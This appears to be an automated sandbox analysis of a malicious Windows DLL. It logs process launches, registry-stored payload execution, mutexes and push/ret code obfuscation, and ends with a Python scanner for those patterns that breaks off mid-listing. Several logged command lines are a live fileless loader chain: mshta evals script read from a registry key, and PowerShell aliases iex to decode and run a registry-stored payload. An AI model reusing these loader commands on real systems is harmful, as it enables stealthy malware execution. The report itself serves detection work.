Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: unknown Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wnczrnms\wnczrnms.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gmpgobli\gmpgobli.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4531.tmp" "c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5221.tmp" "c:\Users\user\AppData\Local\Temp\hupbkl0t\CSC47FEF1B1BE13496F9299275D8347BD99.TMP"
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5A7E.tmp" "c:\Users\user\AppData\Local\Temp\wnczrnms\CSC2E55B817A1C42F79C3F14C28684A599.TMP"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: unknown unknown
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211214
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xeezm4uy.clm.ps1
Source: classification engine Classification label: mal100.troj.evad.winDLL@59/52@18/5
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013E3309 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_013E3309
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{90B75C82-AFA5-4217-B9C4-5396FD38372A}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{94968C51-E390-E6C0-0D08-C77A91BCEB4E}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{A4AE14BF-B329-7663-5D18-970AE1CCBBDE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{BC369832-EBA2-4EDB-55B0-4F6259E4F3B6}
Source: C:\Windows\SysWOW64\regsvr32.exe Mutant created: \Sessions\1\BaseNamedObjects\{9CBC1CBB-4BAF-2EBC-B590-AF42B9C45396}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3628:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{20549BFE-FFF8-5232-8954-A3A6CDC8873A}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{10D8DBC1-2F4C-C28B-3944-D3167DB8B7AA}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5848:120:WilError_01
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{7CC0A445-AB21-0ECB-1570-0F2219A4B376}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{0C9EE140-FBC1-1ECF-E500-5F32E9340386}
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{B8576863-B7B7-AA31-016C-DB7EC5603F92}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{C44FC282-5318-9641-FD38-372A81EC5BFE}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6468:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 61b85f75e6a7c.dll Static file information: File size 1781920 > 1048576
Source: 61b85f75e6a7c.dll Static PE information: Raw size of .rsrc (0x16fa00) is bigger than 0x100000
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EE97E pushad ; iretd 0_2_013EE982
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EAD40 push ecx; ret 0_2_013EAD49
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013EB073 push ecx; ret 0_2_013EB083
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0104C85E pushfd ; iretd 0_2_0104C869
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010492B3 push ecx; ret 0_2_010492C3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_01048D80 push ecx; ret 0_2_01048D89
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0827 push dword ptr [ebp-00000284h]; ret 0_2_013A087F
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [ebp-00000284h]; ret 0_2_013A0A65
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [ebp-0000028Ch]; ret 0_2_013A0AB9
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A08B7 push dword ptr [esp+10h]; ret 0_2_013A0BFB
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0880 push dword ptr [ebp-00000284h]; ret 0_2_013A08B6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC push dword ptr [esp+0Ch]; ret 0_2_013A0C10
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0BFC push dword ptr [esp+10h]; ret 0_2_013A0C56
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0A66 push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0ABA push edx; ret 0_2_013A0B11
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A06F5 push dword ptr [ebp-00000284h]; ret 0_2_013A0764
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_013A0EC5 push 10021990h; ret 0_2_013A0ECC
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DB073 push ecx; ret 3_2_049DB083
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DAD40 push ecx; ret 3_2_049DAD49
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_049DE97E pushad ; iretd 3_2_049DE982
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC push dword ptr [esp+0Ch]; ret 3_2_030E0C10
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0BFC push dword ptr [esp+10h]; ret 3_2_030E0C56
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0827 push dword ptr [ebp-00000284h]; ret 3_2_030E087F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0A66 push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0880 push dword ptr [ebp-00000284h]; ret 3_2_030E08B6
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E0ABA push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [ebp-00000284h]; ret 3_2_030E0A65
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [ebp-0000028Ch]; ret 3_2_030E0AB9
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push edx; ret 3_2_030E0B11
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_030E08B7 push dword ptr [esp+10h]; ret 3_2_030E0BFB
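Every entry above is a `push`/`ret` pair (or `pushad`/`pushfd` followed by `iretd`): the code transfers control through a value it has just placed on the stack instead of using an explicit `jmp` or `call`, so linear disassemblers and call-graph tools lose the edge. The scanner below is an added example, not tool code from this report, that finds the same byte patterns in a raw x86-32 code buffer and, for `push imm32; ret`, recovers the static target. The `CODE` buffer is constructed for the demonstration (its `push 10021990h; ret` mirrors the loaddll32.exe entry above). It is a byte-pattern heuristic rather than a disassembler, so it can match inside unrelated multi-byte instructions, and it does not cover the memory-operand forms such as `push dword ptr [ebp-284h]; ret`.

```python
from __future__ import annotations

import struct

REG32 = ("eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi")
RET, IRETD = 0xC3, 0xCF


def scan_push_ret(code: bytes, base: int = 0) -> list[tuple[int, str, int | None]]:
    """Find push/ret style control transfers in raw x86-32 code.

    Returns (address, mnemonic, static_target) tuples for:
      68 imm32 C3   push imm32 ; ret    target recoverable (imm32)
      50+r    C3    push r32   ; ret    target is whatever r32 holds
      60      CF    pushad     ; iretd  (pushfd ; iretd is 9C CF)
    Byte-pattern heuristic, not a disassembler: it can fire inside other
    multi-byte instructions, so treat hits as leads for manual review.
    """
    hits: list[tuple[int, str, int | None]] = []
    i, n = 0, len(code)
    while i < n:
        b = code[i]
        if b == 0x68 and i + 5 < n and code[i + 5] == RET:
            target = struct.unpack_from("<I", code, i + 1)[0]
            hits.append((base + i, f"push {target:08X}h; ret", target))
            i += 6
        elif 0x50 <= b <= 0x57 and i + 1 < n and code[i + 1] == RET:
            hits.append((base + i, f"push {REG32[b - 0x50]}; ret", None))
            i += 2
        elif b in (0x60, 0x9C) and i + 1 < n and code[i + 1] == IRETD:
            name = "pushad" if b == 0x60 else "pushfd"
            hits.append((base + i, f"{name}; iretd", None))
            i += 2
        else:
            i += 1
    return hits


# Constructed sample buffer: an ordinary prologue followed by three of the
# patterns the report flags. Not bytes taken from the sample.
CODE = bytes([
    0x55, 0x8B, 0xEC,                         # push ebp ; mov ebp, esp
    0x68, 0x90, 0x19, 0x02, 0x10, 0xC3,       # push 10021990h ; ret
    0x51, 0xC3,                               # push ecx ; ret
    0x60, 0xCF,                               # pushad ; iretd
    0xC3,                                     # ret
])

if __name__ == "__main__":
    # Base address is illustrative; use the region's real load address when
    # scanning memory dumped from a process.
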